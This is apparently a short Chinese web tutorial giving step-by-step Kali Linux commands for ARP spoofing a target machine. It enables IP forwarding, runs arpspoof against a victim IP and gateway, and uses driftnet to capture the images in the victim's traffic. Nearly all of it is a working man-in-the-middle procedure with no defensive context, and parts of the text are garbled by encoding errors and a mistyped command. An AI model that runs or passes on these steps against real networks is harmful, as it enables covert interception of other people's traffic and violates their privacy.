您好,登錄后才能下訂單哦!
虛擬機(jī)
Kali linux系統(tǒng)
使用工具:
driftnet 獲取本機(jī)網(wǎng)卡》網(wǎng)卡》查看網(wǎng)卡的圖片信息
例如***目標(biāo)ip:192.168.1.10 網(wǎng)關(guān):192.168.1.1
欺騙語句“
Arpspoof -i 網(wǎng)卡-t 目標(biāo)ip 網(wǎng)關(guān)
例如:arpsp00f-i eth0 192.168.1.10 192.168.1.1
以下兩句請理解:
Arp 欺騙
目標(biāo)ip 流量經(jīng)過我的網(wǎng)卡,從網(wǎng)卡關(guān)出去
Arp斷網(wǎng)
目標(biāo)ip流量經(jīng)過我的網(wǎng)卡
第一步“開啟ip轉(zhuǎn)發(fā)”
命令:echo 1 >/proc/sys/net/ipv4/ip_forward (回車沒有任何的返回)
第二步“開始欺騙”
命令:arpspoof -i eth0 -t 192.168.1.10 192.168.1.1 (回車之后不斷欺騙運(yùn)行中~~~[記得這個窗口需要保留])
第三步“查看目標(biāo)的圖片信息”彈出的窗口請不要關(guān)閉,在窗口就可以看到獲取信息。
命令:driftnet -i eth0
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。